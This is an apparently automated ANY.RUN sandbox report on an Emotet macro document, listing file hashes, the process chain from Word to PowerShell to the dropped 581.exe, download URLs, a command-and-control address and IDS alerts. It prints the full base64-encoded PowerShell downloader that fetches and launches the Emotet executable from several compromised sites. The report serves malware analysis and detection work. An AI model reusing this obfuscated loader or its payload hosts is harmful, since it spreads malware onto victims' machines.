analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Anhang 2019 11 06 35.doc

Full analysis: https://app.any.run/tasks/1be5149c-9d4c-4967-8441-945718402a5a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2019, 13:50:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Nostrum sint rem., Author: Boleslav Sloboda, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 6 06:22:00 2019, Last Saved Time/Date: Wed Nov 6 06:22:00 2019, Number of Pages: 1, Number of Words: 25, Number of Characters: 146, Security: 0
MD5:

5122170A829BF019953647A355A11B85

SHA1:

CFCDA3E96770C39CA87921305286EB1F28E2AAB4

SHA256:

242DB81E9017452051BA203AB173D898D7943799221044A62A41879E78865589

SSDEEP:

3072:Dgzu2Q7H+UaqFh50r/SzFaSadGBrjC48+WZ/yOhh+/iMmVCSWmfEnhV:zHNaqCSzGdD48+ayOn8mVCSWjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wholesspi.exe (PID: 2912)
      • 581.exe (PID: 1884)
      • 581.exe (PID: 3036)
      • wholesspi.exe (PID: 2620)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3772)
    • Emotet process was detected

      • 581.exe (PID: 1884)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3772)
      • 581.exe (PID: 1884)
    • PowerShell script executed

      • powershell.exe (PID: 3772)
    • Executed via WMI

      • powershell.exe (PID: 3772)
    • Creates files in the user directory

      • powershell.exe (PID: 3772)
    • Starts itself from another location

      • 581.exe (PID: 1884)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 944)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 170
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 146
Words: 25
Pages: 1
ModifyDate: 2019:11:06 06:22:00
CreateDate: 2019:11:06 06:22:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Boleslav Sloboda
Subject: -
Title: Nostrum sint rem.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 581.exe no specs #EMOTET 581.exe wholesspi.exe no specs wholesspi.exe

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Anhang 2019 11 06 35.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3772powershell -enco JABMAGUAZQBnAGwAaQB1AGEAdgBiAD0AJwBOAG8AZQBnAGcAYgBvAHYAJwA7ACQAQwBqAGwAcwBrAHAAegBtAGEAbQBjAGUAdQAgAD0AIAAnADUAOAAxACcAOwAkAFQAZQBxAGMAcAByAGcAYQBpAG0AeQB1AD0AJwBRAG4AcQBoAGkAcQBxAHAAbwBsAHgAJwA7ACQAUQBlAGkAZQBjAHcAagBnAHEAcgB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDAGoAbABzAGsAcAB6AG0AYQBtAGMAZQB1ACsAJwAuAGUAeABlACcAOwAkAFYAYwBmAG8AdwBjAGsAbABiAD0AJwBFAGoAbwBhAG4AbwBvAHUAcwAnADsAJABZAGkAbgB3AGgAdwBrAGcAZgBpAGgAPQAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAFEAagBhAGIAeABsAGYAZABnAD0AJwBoAHQAdABwADoALwAvAHMAaQByAGEAagBoAHUAbQBtAHUAcwAuAGMAbwBtAC8AegBzAGYALwB1AG8AegBnAGYAZwAtAHYAOABkAHIANAAzAC0ANgA1ADEALwAqAGgAdAB0AHAAOgAvAC8AbQBhAHIAaQBlAHYAYQAuAHAAcgBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFEAcwBQAFQAagBtAC8AKgBoAHQAdABwAHMAOgAvAC8AYgByAG8AdABoAGUAcgBzAHAAcgBvAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGcAbwBqAGkAZwB1AG8ALQBqAHAAdgBhAC0AMwA4ADgANgA2ADUAMgA3ADAALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGQAbwBsAGwAcwBxAHUAZQBlAG4AcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGsAUQBCAEoAaQBvAFMAbAAvACoAaAB0AHQAcABzADoALwAvAGIAbABvAGcALgB2AHEALQBjAGEAcgBzAC4AdQBrAC8AYwBhAGwAZQBuAGQAYQByAC8ANgA0AG8ALQBkADkAOQBiAGkAaABuAC0AOAA3ADkAOAA5ADcAOAAzAC8AJwAuACIAcwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAE4AeQBuAGcAdABjAGQAcABlAGUAdAA9ACcAWQBjAHgAYwByAGIAYgBwAHQAagAnADsAZgBvAHIAZQBhAGMAaAAoACQAWAB2AHYAeQBlAGIAbwB4AHkAdQBtAGUAdAAgAGkAbgAgACQAUQBqAGEAYgB4AGwAZgBkAGcAKQB7AHQAcgB5AHsAJABZAGkAbgB3AGgAdwBrAGcAZgBpAGgALgAiAGQAYABPAHcAbgBsAGAAbwBBAEQAZgBJAGwAZQAiACgAJABYAHYAdgB5AGUAYgBvAHgAeQB1AG0AZQB0ACwAIAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApADsAJABCAHEAYwBhAHgAYwBkAG4AZgBvAGgAYgBwAD0AJwBIAGwAcABiAGsAeABlAGMAawAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApAC4AIgBsAEUAYABOAGAAZwBUAEgAIgAgAC0AZwBlACAAMwAyADYANwA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgB0ACIAKAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApADsAJABSAHIAYQB1AG8AbABoAHMAPQAnAFAAaABjAHEAeABmAGoAdgAnADsAYgByAGUAYQBrADsAJABJAHQAdQBkAGQAaQByAGIAdwBuAD0AJwBLAHoAbAB3AGUAdQB0AHAAaQBxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAaAB6AHUAYQB6AHQAcAB0AD0AJwBZAHgAeABxAGcAdABmAHYAegBqAGYAeAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3036"C:\Users\admin\581.exe" C:\Users\admin\581.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1884--cd90012cC:\Users\admin\581.exe
581.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2912"C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe"C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe581.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2620--dfba43e0C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe
wholesspi.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 401
Read events
1 554
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
8

Dropped files

PID
Process
Filename
Type
944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA8AE.tmp.cvr
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AD216B1.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32A9FCE7.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFF4E1BC.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F01FB2A.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84467D23.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C429629.wmf
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7136F616.wmf
MD5:
SHA256:
3772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2KTH41EQA7W4G3AE27J.temp
MD5:
SHA256:
944WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3772
powershell.exe
GET
200
160.153.43.0:80
http://sirajhummus.com/zsf/uozgfg-v8dr43-651/
US
executable
186 Kb
whitelisted
2620
wholesspi.exe
POST
189.252.102.40:8080
http://189.252.102.40:8080/report/sym/add/merge/
MX
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3772
powershell.exe
160.153.43.0:80
sirajhummus.com
GoDaddy.com, LLC
US
suspicious
189.252.102.40:8080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
sirajhummus.com
  • 160.153.43.0
whitelisted

Threats

PID
Process
Class
Message
3772
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3772
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3772
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info